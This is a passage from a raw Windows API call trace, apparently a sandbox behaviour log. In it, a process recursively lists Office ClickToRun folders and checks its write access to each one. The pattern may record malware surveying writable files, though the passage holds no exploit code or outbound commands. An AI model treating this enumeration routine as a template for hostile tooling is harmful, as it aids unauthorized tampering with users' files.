hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.010] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\D3BE4D83-2D47-4B3D-97F1-5483AB9ADC5C\\x-none.16\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc398 [0106.037] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\D3BE4D83-2D47-4B3D-97F1-5483AB9ADC5C\\x-none.16", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.037] GetLastError () returned 0x7a [0106.037] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\D3BE4D83-2D47-4B3D-97F1-5483AB9ADC5C\\x-none.16", RequestedInformation=0x7, pSecurityDescriptor=0x572db8, nLength=0x90, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572db8, lpnLengthNeeded=0x281afc8) returned 1 [0106.037] GetLastError () returned 0x7a [0106.037] GetCurrentThread () returned 0xfffffffe [0106.037] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.037] GetCurrentProcess () returned 0xffffffff [0106.037] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.037] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x344) returned 1 [0106.037] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.037] AccessCheck (in: pSecurityDescriptor=0x572db8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.037] CloseHandle (hObject=0x344) returned 1 [0106.037] CloseHandle (hObject=0x32c) returned 1 [0106.037] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.037] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.037] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.037] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.037] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.037] FindClose (in: hFindFile=0x5fc398 | out: hFindFile=0x5fc398) returned 1 [0106.038] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.038] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.038] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.038] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.038] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.038] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.038] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\FCE80778-F5A2-48B5-BF04-93D6E887CBA7\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.040] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\FCE80778-F5A2-48B5-BF04-93D6E887CBA7", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.040] GetLastError () returned 0x7a [0106.040] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\FCE80778-F5A2-48B5-BF04-93D6E887CBA7", RequestedInformation=0x7, pSecurityDescriptor=0x5716a8, nLength=0x90, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x5716a8, lpnLengthNeeded=0x281b560) returned 1 [0106.040] GetLastError () returned 0x7a [0106.040] GetCurrentThread () returned 0xfffffffe [0106.040] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.040] GetCurrentProcess () returned 0xffffffff [0106.040] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x33c) returned 1 [0106.040] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.040] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.040] AccessCheck (in: pSecurityDescriptor=0x5716a8, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.040] CloseHandle (hObject=0x32c) returned 1 [0106.040] CloseHandle (hObject=0x33c) returned 1 [0106.040] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.040] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.040] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\FCE80778-F5A2-48B5-BF04-93D6E887CBA7\\en-us.16\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc398 [0106.041] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\FCE80778-F5A2-48B5-BF04-93D6E887CBA7\\en-us.16", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.041] GetLastError () returned 0x7a [0106.041] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\FCE80778-F5A2-48B5-BF04-93D6E887CBA7\\en-us.16", RequestedInformation=0x7, pSecurityDescriptor=0x572db8, nLength=0x90, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572db8, lpnLengthNeeded=0x281afc8) returned 1 [0106.041] GetLastError () returned 0x7a [0106.041] GetCurrentThread () returned 0xfffffffe [0106.041] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.041] GetCurrentProcess () returned 0xffffffff [0106.041] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.041] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x344) returned 1 [0106.041] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.041] AccessCheck (in: pSecurityDescriptor=0x572db8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.041] CloseHandle (hObject=0x344) returned 1 [0106.041] CloseHandle (hObject=0x32c) returned 1 [0106.042] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.042] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.042] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.042] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.042] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.042] FindClose (in: hFindFile=0x5fc398 | out: hFindFile=0x5fc398) returned 1 [0106.042] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.042] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\FCE80778-F5A2-48B5-BF04-93D6E887CBA7\\x-none.16\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc398 [0106.052] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\FCE80778-F5A2-48B5-BF04-93D6E887CBA7\\x-none.16", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.052] GetLastError () returned 0x7a [0106.052] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\FCE80778-F5A2-48B5-BF04-93D6E887CBA7\\x-none.16", RequestedInformation=0x7, pSecurityDescriptor=0x572db8, nLength=0x90, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x572db8, lpnLengthNeeded=0x281afc8) returned 1 [0106.053] GetLastError () returned 0x7a [0106.053] GetCurrentThread () returned 0xfffffffe [0106.053] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.053] GetCurrentProcess () returned 0xffffffff [0106.053] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.053] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x344) returned 1 [0106.053] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.053] AccessCheck (in: pSecurityDescriptor=0x572db8, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.053] CloseHandle (hObject=0x344) returned 1 [0106.053] CloseHandle (hObject=0x32c) returned 1 [0106.053] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.053] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.053] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.053] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.053] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.053] FindClose (in: hFindFile=0x5fc398 | out: hFindFile=0x5fc398) returned 1 [0106.053] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0 [0106.053] FindClose (in: hFindFile=0x5fc358 | out: hFindFile=0x5fc358) returned 1 [0106.053] FindNextFileW (in: hFindFile=0x5fc318, lpFindFileData=0x281bb1c | out: lpFindFileData=0x281bb1c) returned 1 [0106.054] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\*", lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 0x5fc358 [0106.054] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281b560) returned 0 [0106.054] GetLastError () returned 0x7a [0106.054] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData", RequestedInformation=0x7, pSecurityDescriptor=0x571600, nLength=0x90, lpnLengthNeeded=0x281b560 | out: pSecurityDescriptor=0x571600, lpnLengthNeeded=0x281b560) returned 1 [0106.054] GetLastError () returned 0x7a [0106.054] GetCurrentThread () returned 0xfffffffe [0106.054] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x0) returned 0 [0106.054] GetCurrentProcess () returned 0xffffffff [0106.054] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281b568 | out: TokenHandle=0x281b568*=0x33c) returned 1 [0106.054] DuplicateToken (in: ExistingTokenHandle=0x33c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281b564 | out: DuplicateTokenHandle=0x281b564*=0x32c) returned 1 [0106.054] MapGenericMask (in: AccessMask=0x281b574, GenericMapping=0x281b544 | out: AccessMask=0x281b574) [0106.054] AccessCheck (in: pSecurityDescriptor=0x571600, ClientToken=0x32c, DesiredAccess=0x120116, GenericMapping=0x281b544, PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c | out: PrivilegeSet=0x281b530, PrivilegeSetLength=0x281b554, GrantedAccess=0x281b558, AccessStatus=0x281b55c) returned 1 [0106.054] CloseHandle (hObject=0x32c) returned 1 [0106.054] CloseHandle (hObject=0x33c) returned 1 [0106.054] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.054] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.054] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc398 [0106.054] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.055] GetLastError () returned 0x7a [0106.055] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog", RequestedInformation=0x7, pSecurityDescriptor=0x571678, nLength=0x90, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x571678, lpnLengthNeeded=0x281afc8) returned 1 [0106.055] GetLastError () returned 0x7a [0106.055] GetCurrentThread () returned 0xfffffffe [0106.055] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.055] GetCurrentProcess () returned 0xffffffff [0106.055] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.055] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x344) returned 1 [0106.055] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.055] AccessCheck (in: pSecurityDescriptor=0x571678, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.055] CloseHandle (hObject=0x344) returned 1 [0106.055] CloseHandle (hObject=0x32c) returned 1 [0106.055] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.055] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.055] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\*", lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 0x5fc3d8 [0106.055] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281aa30 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281aa30) returned 0 [0106.055] GetLastError () returned 0x7a [0106.055] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0x90, lpnLengthNeeded=0x281aa30 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281aa30) returned 1 [0106.055] GetLastError () returned 0x7a [0106.055] GetCurrentThread () returned 0xfffffffe [0106.055] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281aa38 | out: TokenHandle=0x281aa38*=0x0) returned 0 [0106.055] GetCurrentProcess () returned 0xffffffff [0106.055] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281aa38 | out: TokenHandle=0x281aa38*=0x344) returned 1 [0106.055] DuplicateToken (in: ExistingTokenHandle=0x344, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281aa34 | out: DuplicateTokenHandle=0x281aa34*=0x348) returned 1 [0106.055] MapGenericMask (in: AccessMask=0x281aa44, GenericMapping=0x281aa14 | out: AccessMask=0x281aa44) [0106.055] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x348, DesiredAccess=0x120116, GenericMapping=0x281aa14, PrivilegeSet=0x281aa00, PrivilegeSetLength=0x281aa24, GrantedAccess=0x281aa28, AccessStatus=0x281aa2c | out: PrivilegeSet=0x281aa00, PrivilegeSetLength=0x281aa24, GrantedAccess=0x281aa28, AccessStatus=0x281aa2c) returned 1 [0106.055] CloseHandle (hObject=0x348) returned 1 [0106.056] CloseHandle (hObject=0x344) returned 1 [0106.056] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.056] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 1 [0106.056] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\*", lpFindFileData=0x281a4bc | out: lpFindFileData=0x281a4bc) returned 0x5fc418 [0106.056] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281a498 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281a498) returned 0 [0106.056] GetLastError () returned 0x7a [0106.056] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0x90, lpnLengthNeeded=0x281a498 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x281a498) returned 1 [0106.056] GetLastError () returned 0x7a [0106.056] GetCurrentThread () returned 0xfffffffe [0106.056] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281a4a0 | out: TokenHandle=0x281a4a0*=0x0) returned 0 [0106.056] GetCurrentProcess () returned 0xffffffff [0106.056] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281a4a0 | out: TokenHandle=0x281a4a0*=0x348) returned 1 [0106.056] DuplicateToken (in: ExistingTokenHandle=0x348, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281a49c | out: DuplicateTokenHandle=0x281a49c*=0x34c) returned 1 [0106.056] MapGenericMask (in: AccessMask=0x281a4ac, GenericMapping=0x281a47c | out: AccessMask=0x281a4ac) [0106.056] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x34c, DesiredAccess=0x120116, GenericMapping=0x281a47c, PrivilegeSet=0x281a468, PrivilegeSetLength=0x281a48c, GrantedAccess=0x281a490, AccessStatus=0x281a494 | out: PrivilegeSet=0x281a468, PrivilegeSetLength=0x281a48c, GrantedAccess=0x281a490, AccessStatus=0x281a494) returned 1 [0106.056] CloseHandle (hObject=0x34c) returned 1 [0106.056] CloseHandle (hObject=0x348) returned 1 [0106.056] FindNextFileW (in: hFindFile=0x5fc418, lpFindFileData=0x281a4bc | out: lpFindFileData=0x281a4bc) returned 1 [0106.057] FindNextFileW (in: hFindFile=0x5fc418, lpFindFileData=0x281a4bc | out: lpFindFileData=0x281a4bc) returned 1 [0106.057] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}\\*", lpFindFileData=0x2819f24 | out: lpFindFileData=0x2819f24) returned 0x5fc458 [0106.057] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x2819f00 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x2819f00) returned 0 [0106.057] GetLastError () returned 0x7a [0106.057] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Catalog\\Packages\\{9AC08E99-230B-47E8-9721-4577B7F124EA}\\{1A8308C7-90D1-4200-B16E-646F163A08E8}", RequestedInformation=0x7, pSecurityDescriptor=0x572cc0, nLength=0x90, lpnLengthNeeded=0x2819f00 | out: pSecurityDescriptor=0x572cc0, lpnLengthNeeded=0x2819f00) returned 1 [0106.057] GetLastError () returned 0x7a [0106.057] GetCurrentThread () returned 0xfffffffe [0106.057] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x2819f08 | out: TokenHandle=0x2819f08*=0x0) returned 0 [0106.057] GetCurrentProcess () returned 0xffffffff [0106.057] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x2819f08 | out: TokenHandle=0x2819f08*=0x34c) returned 1 [0106.057] DuplicateToken (in: ExistingTokenHandle=0x34c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x2819f04 | out: DuplicateTokenHandle=0x2819f04*=0x350) returned 1 [0106.057] MapGenericMask (in: AccessMask=0x2819f14, GenericMapping=0x2819ee4 | out: AccessMask=0x2819f14) [0106.057] AccessCheck (in: pSecurityDescriptor=0x572cc0, ClientToken=0x350, DesiredAccess=0x120116, GenericMapping=0x2819ee4, PrivilegeSet=0x2819ed0, PrivilegeSetLength=0x2819ef4, GrantedAccess=0x2819ef8, AccessStatus=0x2819efc | out: PrivilegeSet=0x2819ed0, PrivilegeSetLength=0x2819ef4, GrantedAccess=0x2819ef8, AccessStatus=0x2819efc) returned 1 [0106.057] CloseHandle (hObject=0x350) returned 1 [0106.057] CloseHandle (hObject=0x34c) returned 1 [0106.057] FindNextFileW (in: hFindFile=0x5fc458, lpFindFileData=0x2819f24 | out: lpFindFileData=0x2819f24) returned 1 [0106.057] FindNextFileW (in: hFindFile=0x5fc458, lpFindFileData=0x2819f24 | out: lpFindFileData=0x2819f24) returned 1 [0106.057] FindNextFileW (in: hFindFile=0x5fc458, lpFindFileData=0x2819f24 | out: lpFindFileData=0x2819f24) returned 1 [0106.057] FindNextFileW (in: hFindFile=0x5fc458, lpFindFileData=0x2819f24 | out: lpFindFileData=0x2819f24) returned 1 [0106.057] FindNextFileW (in: hFindFile=0x5fc458, lpFindFileData=0x2819f24 | out: lpFindFileData=0x2819f24) returned 1 [0106.057] FindNextFileW (in: hFindFile=0x5fc458, lpFindFileData=0x2819f24 | out: lpFindFileData=0x2819f24) returned 0 [0106.057] FindClose (in: hFindFile=0x5fc458 | out: hFindFile=0x5fc458) returned 1 [0106.057] FindNextFileW (in: hFindFile=0x5fc418, lpFindFileData=0x281a4bc | out: lpFindFileData=0x281a4bc) returned 0 [0106.057] FindClose (in: hFindFile=0x5fc418 | out: hFindFile=0x5fc418) returned 1 [0106.058] FindNextFileW (in: hFindFile=0x5fc3d8, lpFindFileData=0x281aa54 | out: lpFindFileData=0x281aa54) returned 0 [0106.058] FindClose (in: hFindFile=0x5fc3d8 | out: hFindFile=0x5fc3d8) returned 1 [0106.058] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0 [0106.058] FindClose (in: hFindFile=0x5fc398 | out: hFindFile=0x5fc398) returned 1 [0106.058] FindNextFileW (in: hFindFile=0x5fc358, lpFindFileData=0x281b584 | out: lpFindFileData=0x281b584) returned 1 [0106.058] FindFirstFileW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration\\*", lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 0x5fc398 [0106.058] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration", RequestedInformation=0x7, pSecurityDescriptor=0x0, nLength=0x0, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x0, lpnLengthNeeded=0x281afc8) returned 0 [0106.058] GetLastError () returned 0x7a [0106.058] GetFileSecurityW (in: lpFileName="c:\\ProgramData\\Microsoft\\ClickToRun\\MachineData\\Integration", RequestedInformation=0x7, pSecurityDescriptor=0x571728, nLength=0x90, lpnLengthNeeded=0x281afc8 | out: pSecurityDescriptor=0x571728, lpnLengthNeeded=0x281afc8) returned 1 [0106.058] GetLastError () returned 0x7a [0106.058] GetCurrentThread () returned 0xfffffffe [0106.058] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000e, OpenAsSelf=1, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x0) returned 0 [0106.058] GetCurrentProcess () returned 0xffffffff [0106.058] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000e, TokenHandle=0x281afd0 | out: TokenHandle=0x281afd0*=0x32c) returned 1 [0106.058] DuplicateToken (in: ExistingTokenHandle=0x32c, ImpersonationLevel=0x2, DuplicateTokenHandle=0x281afcc | out: DuplicateTokenHandle=0x281afcc*=0x344) returned 1 [0106.058] MapGenericMask (in: AccessMask=0x281afdc, GenericMapping=0x281afac | out: AccessMask=0x281afdc) [0106.058] AccessCheck (in: pSecurityDescriptor=0x571728, ClientToken=0x344, DesiredAccess=0x120116, GenericMapping=0x281afac, PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4 | out: PrivilegeSet=0x281af98, PrivilegeSetLength=0x281afbc, GrantedAccess=0x281afc0, AccessStatus=0x281afc4) returned 1 [0106.058] CloseHandle (hObject=0x344) returned 1 [0106.058] CloseHandle (hObject=0x32c) returned 1 [0106.058] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.059] FindNextFileW (in: hFindFile=0x5fc398, lpFindFileData=0x281afec | out: lpFindFileData=0x281afec) returned 1 [0106.059] 